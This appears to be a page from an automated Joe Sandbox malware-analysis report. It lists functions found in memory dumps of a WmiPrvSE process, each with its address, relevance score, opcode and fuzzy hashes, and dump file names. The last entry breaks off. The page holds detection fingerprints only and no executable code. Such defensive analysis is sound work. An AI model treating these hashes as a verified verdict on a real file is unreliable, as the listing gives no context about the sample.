API String ID:
Opcode ID: 10c435049bf4365890217061877e44cdcba4e35cbd7f1acb43788b3f75dc3289
Instruction ID: d493b59b72d64f56d9c58f81173923b2ca9aaba1a09bad64fdabd49074a755c1
Opcode Fuzzy Hash: 10c435049bf4365890217061877e44cdcba4e35cbd7f1acb43788b3f75dc3289
Instruction Fuzzy Hash: 73D1B13061955BCFEB58CF68C0E49B437A1FF45310B6541BED84B8B69ED638E982CB81

Function 00007FFD9BC6E1CF Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513d0b16c783af37a0f3af53f55bad8edce2639515527a9efe2d4da0db3f8331
Instruction ID: 8259a58c04b25845866e09e7e1c039a861b3e4695c061005246ad6c3f84a7b2a
Opcode Fuzzy Hash: 513d0b16c783af37a0f3af53f55bad8edce2639515527a9efe2d4da0db3f8331
Instruction Fuzzy Hash: FBC1C03061965BCFEB18CF68C0E49B537A1FF45310B6145BED84B8B69ADA38E582CB41

Function 00007FFD9BC689CF Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46bf3a463b768254218a6e375e04a38657cf74b1e2e3597dc4d46ecf46598c2
Instruction ID: 8122e80239265f208f232f0e9f3a426b03aed922f6eb424941ac05b2eb2f88f4
Opcode Fuzzy Hash: d46bf3a463b768254218a6e375e04a38657cf74b1e2e3597dc4d46ecf46598c2
Instruction Fuzzy Hash: 5DC1023061A54BCFEB1DCF68C0E09B837A1FF45304B5545BEC84A8B69BC638E981CB54

Function 00007FFD9BFF508F Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a82b3df7548a886d987f9dcc001b289d44be2492ff0d3f037e1e818c869ca3c
Instruction ID: 98508a581e7b21b1d1208c1fd15e81d21dbfc4c279225c3787edb9c295430006
Opcode Fuzzy Hash: 8a82b3df7548a886d987f9dcc001b289d44be2492ff0d3f037e1e818c869ca3c
Instruction Fuzzy Hash: 0FC1E13071A65A8BEB1DCF48C0E51B53BA1FF45301B5546BDC84B8B69BCA39F591CB80

Function 00007FFD9BC6DA62 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5cbb5641b9275cadb06b20d3017e90aee726d0e5fe1d5a8175e034d3c541882
Instruction ID: 397cf60d6a5db6c497b1e3d6712efe4613ed1871eaf7f21ecd7ebf42035e1557
Opcode Fuzzy Hash: a5cbb5641b9275cadb06b20d3017e90aee726d0e5fe1d5a8175e034d3c541882
Instruction Fuzzy Hash: 5EC10430B1DA4B9FE759DF68C0A0AB8B7A1FF59300F4541B9C04EC7A96DB28B951C790

Function 00007FFD9BC68262 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c82479d7f2ee50a514189c7bd1070fc74436bdfe03c5119e510a3b500d82e8a
Instruction ID: c9560b1788daedfae159219336ec75dc175171e7cf0e828cdf57ce4f67113b79
Opcode Fuzzy Hash: 0c82479d7f2ee50a514189c7bd1070fc74436bdfe03c5119e510a3b500d82e8a
Instruction Fuzzy Hash: 8BC10670B0DA4B8FE759DB68C070AB8BBA1FF55304F4541BAC04EC7A96DB28B951C781

Function 00007FFD9BC666E0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1f492723e5b91b418951a636b93f4ada6560da071296d61ec47e84957ef120
Instruction ID: 3ccaadd7deb1d9bc2fdb8f2fcac054a684650958394147d14337292154e7362b
Opcode Fuzzy Hash: 3c1f492723e5b91b418951a636b93f4ada6560da071296d61ec47e84957ef120
Instruction Fuzzy Hash: 9F918130718A1D8FDB58DB68C899DB9B3E2FF59314B1541B9D04EC72A6DA35EC42CB40

Function 00007FFD9BFF497A Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af521ecf7610adde9b8c2a73123fd03dbf915056bd409a0e2b0151086c971120
Instruction ID: 8d8f4fda264a4ab2700899b0a4fb488111d3ad8048c74bf778f6f2957b656cf9
Opcode Fuzzy Hash: af521ecf7610adde9b8c2a73123fd03dbf915056bd409a0e2b0151086c971120
Instruction Fuzzy Hash: 61A1283070EA8A4FE759DF69C4A06A4BBA1FF45300F4542BDC04EC7AA7DB29B951C780

Function 00007FFD9BFF8F70 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7235a0ec1b58979b8306c4c0806b2543dc33f7f70e1fb4e37785f256708a60f0
Instruction ID: 9d7065636d25e28d5ea5a9709cef44efcf6453ab9b8bec5bedae857d2b1fe421
Opcode Fuzzy Hash: 7235a0ec1b58979b8306c4c0806b2543dc33f7f70e1fb4e37785f256708a60f0
Instruction Fuzzy Hash: 04B1AA70A0995D8FDF99EF58C8A8BA877B1FB68301F1401E9900DD72A5DE35AE81CF40

Function 00007FFD9BFF3E66 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad01e4c36896790f8ffd343015b62c62b506641859e4fb58f327375a9ccef42
Instruction ID: 5432d7b5ae14503269d40157ccab47f5c55cdb982e38f8b304d4e023d0bfccbe
Opcode Fuzzy Hash: cad01e4c36896790f8ffd343015b62c62b506641859e4fb58f327375a9ccef42
Instruction Fuzzy Hash: 34814931B0E64A4FE33C9EAC94655B57BE1EF91310B1606BED48FC31E2DE2A79068741

Function 00007FFD9BC677A6 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a132d1ee7ddd7e392b29ce94f34ea1c3f69138ae738d98f56771d2ec01418b85
Instruction ID: e0025c69ce65985e68ee10688e5367e1e2438345487248da27fe9c7c80075930
Opcode Fuzzy Hash: a132d1ee7ddd7e392b29ce94f34ea1c3f69138ae738d98f56771d2ec01418b85
Instruction Fuzzy Hash: 9C814B31B0E60BCFE3395AB894219BD77E1EF55310B26097FD49EC31A2DE2879028751

Function 00007FFD9BC6CF96 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f482a9d1d632acc833f8d1932a0935d3cc084dec79fd92298edae905561e7522
Instruction ID: c0ea4828895dffb18aea573117c649f18e74d4e28f9031804ae6ef10ee62acfe
Opcode Fuzzy Hash: f482a9d1d632acc833f8d1932a0935d3cc084dec79fd92298edae905561e7522
Instruction Fuzzy Hash: DE814B31B0E64BCFE3388AB8946197977E1FF91321B1601BED48EC71A3DA69B5024742

Function 00007FFD9BC65BF9 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8106bd6bfb51e7dff651ed36ec47b2b13ddcecb7bdf1a14033a763b7aad45b
Instruction ID: 9fe74589eccf376deb12fe6a2e200626979e26668e600da66604b307fd70161e
Opcode Fuzzy Hash: cb8106bd6bfb51e7dff651ed36ec47b2b13ddcecb7bdf1a14033a763b7aad45b
Instruction Fuzzy Hash: 7971C731B0D54F8FE778DB68886E9BC37D0EF49311B2502B9D49EC75A2E918B9068781

Function 00007FFD9BC6BCCB Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc431a1684a65b64fc0a10196128e3cf6e8402efeacbf1a3e68a55d370d866b
Instruction ID: 1af3c4931b66691f967b40ec05287d5f93f18070a2234dbf3912bffe09ecc649
Opcode Fuzzy Hash: 5fc431a1684a65b64fc0a10196128e3cf6e8402efeacbf1a3e68a55d370d866b
Instruction Fuzzy Hash: 1C81A430E1EA4FCEEB65DBB48862ABCBBA1EF45300F510179D00ED71E6EE286941C740

Function 00007FFD9BFF2B6B Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749a3a499579b82f987fbb4eed355dc057fcbe4484ff0aabb6987b99fe4258d3
Instruction ID: 10bf60b598cd72603279342f067a0dbee52c6d2fbe703049e71ea548a0c6af80
Opcode Fuzzy Hash: 749a3a499579b82f987fbb4eed355dc057fcbe4484ff0aabb6987b99fe4258d3
Instruction Fuzzy Hash: 2E81C330F1E54E8EEB69DFE488646BCBBA0FF45340F9106B9E00ED71E5DE296A458701

Function 00007FFD9BC664CB Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88aabd2c1e5c25a2fbe00fcf28951650596adc865dff87c6edb11c8784527de
Instruction ID: 08fb48c95ec0a0c1b5a1f68fb6bc8d6a62771cb61809b0d8aecfd444dff83145
Opcode Fuzzy Hash: b88aabd2c1e5c25a2fbe00fcf28951650596adc865dff87c6edb11c8784527de
Instruction Fuzzy Hash: D481A330A1D64FCFEB65DBB88865AFC7BA0FF55300F5501BAE00ED71A5DA38A9418741

Function 00007FFD9BC699F1 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521e40c93d89831cc2f30a5de759a44eece3bcd671740cbd86eb46de074532fc
Instruction ID: 3dd42ce41bd30f3eb5f18a0159c49990a1f88535c0c9897e5075f928aadd9f2b
Opcode Fuzzy Hash: 521e40c93d89831cc2f30a5de759a44eece3bcd671740cbd86eb46de074532fc
Instruction Fuzzy Hash: 5C81B13060EB0BCFD378CB64C1A997977E1FF49314B51057DC48AC7AA2DAA9B942CB41

Function 00007FFD9BC6ACF2 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04736552122ab21f4cfb8da9d134fc1c3e2785f77685513279d308a22dd3726
Instruction ID: fa49120b9e930c030c33c5fd99608b0e6d9c19b2af49d48a48b91587cc58e201
Opcode Fuzzy Hash: b04736552122ab21f4cfb8da9d134fc1c3e2785f77685513279d308a22dd3726
Instruction Fuzzy Hash: F461F961A0EADF9FD716D7B89C748ED7F60EF02208B1901B7E0998B1D3E91869068791

Function 00007FFD9BFF8D02 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42501ab00cb3db03b40ae33a934ea39a5a295c50da232f75e69cbbe0fb2a90b
Instruction ID: 4af5b1e8f7b1588e8621e73b0a32d3a23f35a263e0eb41517b10093aeb1dc814
Opcode Fuzzy Hash: a42501ab00cb3db03b40ae33a934ea39a5a295c50da232f75e69cbbe0fb2a90b
Instruction Fuzzy Hash: BF71AA71A0895C8FDF99EF18C8A9BA8B7B1FB69301F1441E9900DD3291DE31AE81CF40

Function 00007FFD9BC6C9A6 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e024b33bdd55303e929862c9a7382693f6b8d923b2c13e7160133d5eae361d
Instruction ID: d4991ce401e152f0aacef3495edccb555762dce9fe467f119d41e00a440c7ff2
Opcode Fuzzy Hash: d0e024b33bdd55303e929862c9a7382693f6b8d923b2c13e7160133d5eae361d
Instruction Fuzzy Hash: 8361D771B0990E9FD768DB68D4A1AE9B7A2FF94311F114139E05EC3292DF35B9428780

Function 00007FFD9BFF5400 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a51e8e2cb57bdb0e73f1d0313c6ac954a86e2ac01384df418342afbc38de07
Instruction ID: a50222b7aa8381fe43a9ddde760a56fc83ab67bee3ef69e00da95139ca9cc50f
Opcode Fuzzy Hash: a2a51e8e2cb57bdb0e73f1d0313c6ac954a86e2ac01384df418342afbc38de07
Instruction Fuzzy Hash: 0C513630F1E55E4EEBB8DB4884757B87BA1FF54301F1542FAC05EC31A6DD286A818741

Function 00007FFD9BFF498F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422bcb5fae91947b38a5b7333e00988644f95654167c18d853eaeb1e1ab1fc68
Instruction ID: 71f26f76a2f35728ab3f363bdac8944c65115dc02c90e71232cadcc954e8bd5d
Opcode Fuzzy Hash: 422bcb5fae91947b38a5b7333e00988644f95654167c18d853eaeb1e1ab1fc68
Instruction Fuzzy Hash: 2A51A130B1990B5BE758EF5AD0A16A4BB91FF58300F51827DC00EC7AA6DB39F9518B80

Function 00007FFD9B8A090D Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1887668865.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb170d523250f134efcdcb662532721702a518eb630dd836a7da57169bd033f5
Instruction ID: 9c1e4791b670a7a709062475d7e210193138cc49e4098743fc54aa360da9dbff
Opcode Fuzzy Hash: eb170d523250f134efcdcb662532721702a518eb630dd836a7da57169bd033f5
Instruction Fuzzy Hash: 31417912B0E5A90ED309B7B874AA5F97B90DF49320F0504FFD44EC71E7DC1868428294

Function 00007FFD9BFF6CB8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d4a19f1e89acc41ed86e8034d57bf9a0f6d5a9b312bd79baffdc01dd777db8
Instruction ID: d1c5f1415078f239b726d06764da6f3e45e28c9c9d813258e11ccc43e45865f3
Opcode Fuzzy Hash: e1d4a19f1e89acc41ed86e8034d57bf9a0f6d5a9b312bd79baffdc01dd777db8
Instruction Fuzzy Hash: BD51B974A0491D8FDF98EF18C898BA877B1FB68305F5041E9D00EE76A5DA31AD92CF50

Function 00007FFD9BFFB5E9 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c115e1755f4964aa16fac1195d6e660ff686ae386e6dd0ddc05c56d92699ce
Instruction ID: 1a904586e0bdff7d348cb7086309743c530c6f1005bb65ce9115432326ccd0a5
Opcode Fuzzy Hash: 38c115e1755f4964aa16fac1195d6e660ff686ae386e6dd0ddc05c56d92699ce
Instruction Fuzzy Hash: D151AE71A1995C8FDFA8EF58C8A9BA4B7B1FB69301F1001E9900DD7261DE35AE81CF50

Function 00007FFD9BC6A017 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0fd25f92727040f96033b5917913dc3aaaa62dad4d20336ddd0fea81db1ff6
Instruction ID: 69a7748614fb0247439d620fc3e4e78bc2b20e34fb2e96aa0982b48d322880e4
Opcode Fuzzy Hash: aa0fd25f92727040f96033b5917913dc3aaaa62dad4d20336ddd0fea81db1ff6
Instruction Fuzzy Hash: BB41B33260C949CFDF9CEB28D4A5DA8B3E1FBA932571401AAD00EC7296DE25F855CB41

Function 00007FFD9BC600D7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94caee818a22a09b59aa79339844ae0aa69bff45c8147fe90a536519d1c1cc61
Instruction ID: b835678f964fe85b2122dfec734c8643d1c2a4fc21b158dda4faac7f6d0e4140
Opcode Fuzzy Hash: 94caee818a22a09b59aa79339844ae0aa69bff45c8147fe90a536519d1c1cc61
Instruction Fuzzy Hash: 8741823160CA498FDF9CEB28D4A5DA973E1FBA8320B1545AAD44EC3196DE31FC45CB81

Function 00007FFD9BFF66D7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6bab2e12a47934a2bcb27230b9650042d9a2d9a6c633c8dc6e07f97a69ae03
Instruction ID: 0c649098d9c6212ceb3a68db3a81e66dfbb18ae83c1726388afe735634c562b8
Opcode Fuzzy Hash: 8f6bab2e12a47934a2bcb27230b9650042d9a2d9a6c633c8dc6e07f97a69ae03
Instruction Fuzzy Hash: 9E418F3270D9488FEF9CFF18C4A5DA577E1FBA9321B1402AAD04EC3196DE25E851CB91

Function 00007FFD9BFF00D7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0925a9c55475cf2a1573e3f83bc1df6de51101b9921b68a03be26918bc933cd8
Instruction ID: 2c78b824c8e2b818d21d513d9eb9386cdf287ff30b6914c633627a267517f3d5
Opcode Fuzzy Hash: 0925a9c55475cf2a1573e3f83bc1df6de51101b9921b68a03be26918bc933cd8
Instruction Fuzzy Hash: C441B73270D9488FDF5CFF18C4A9DA5B7E1FBA932070442AAD40EC31A6DE25E955CB41

Function 00007FFD9BC6E540 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a809b8a92fd5eaa82b9b7926cb381edf603ed0e3f7ea976412f78edc1e428c
Instruction ID: e0691dafa6b434357cc5617d13d75fb6f1d3f0df4738e8a36badbddd0239cac2
Opcode Fuzzy Hash: 20a809b8a92fd5eaa82b9b7926cb381edf603ed0e3f7ea976412f78edc1e428c
Instruction Fuzzy Hash: 7241FB30A1D96FCEEB78D6688474ABC77A1FF54300F1541BBD04EC719AED38AA858B41

Function 00007FFD9BC65A39 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7f5c04eff66ceb127b89bf413944e3cedba15db05643e7dad1dac25d0aa69c
Instruction ID: 3f9a204ea5069677c1f75f1f01e1a0123204363a5360d73a2d641a6cc51b666c
Opcode Fuzzy Hash: 5c7f5c04eff66ceb127b89bf413944e3cedba15db05643e7dad1dac25d0aa69c
Instruction Fuzzy Hash: C931B171E0F29FDEFB3956B458799BC3680FF01360F3601BAD45E861E2E91C3A429252

Function 00007FFD9BC65880 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2fe03e15667274879c68745b3006ab6b68c163b22b5b85f195ba46f61fa0f4
Instruction ID: fc30d165db1eb00afa460ff9c473fb9560aaada3dd254d72a94ef2ff04218070
Opcode Fuzzy Hash: 9f2fe03e15667274879c68745b3006ab6b68c163b22b5b85f195ba46f61fa0f4
Instruction Fuzzy Hash: B541D131A0E69ECFDB59EBA8D8649EC7BB0FF05314F1801BAD019D7193EE2869058751

Function 00007FFD9BFFDD1F Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb41371ebdc6f57c7d4ca96601818f7f5bfac0e74ba4ac9041dbdc20b5ad65d8
Instruction ID: d06be594519a7ec44ff2e1f125017da1877db91f567c84a5d46a597948645518
Opcode Fuzzy Hash: fb41371ebdc6f57c7d4ca96601818f7f5bfac0e74ba4ac9041dbdc20b5ad65d8
Instruction Fuzzy Hash: 38319D77F1AD4E0BEB69DF9C58A51B977D2FBE8350B050276D00DC32A6EE25BC024280

Function 00007FFD9BFFDDEB Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6cf2ef05714d0df394bd3eba76cfb11aa365be8075ea23b898f01fe53ea992
Instruction ID: 6ada2a222321e505c19aaae02c375eddba3f31607d503a6d2987a91e90a1e8bb
Opcode Fuzzy Hash: 5d6cf2ef05714d0df394bd3eba76cfb11aa365be8075ea23b898f01fe53ea992
Instruction Fuzzy Hash: D2314626F09D0E0BEB9CDA6C68A517977C3EFE87407594279D01EC329AEE39AC024241

Function 00007FFD9BC60181 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff0049b1a4286c8fc3d3eb37a23e9f1afef5c7635cf4b6eb3a5a647905263d60
Instruction ID: 100c4c8792bb2e9aa5a9fdc4c24a9ae41df7621b5bae5366f81b9e3435e3684b
Opcode Fuzzy Hash: ff0049b1a4286c8fc3d3eb37a23e9f1afef5c7635cf4b6eb3a5a647905263d60
Instruction Fuzzy Hash: 9031A031608A498FDB5CEB28C4A5EA573E1FBA831071445ADD45AC71A6DE31E845CB81

Function 00007FFD9BC6A0C1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
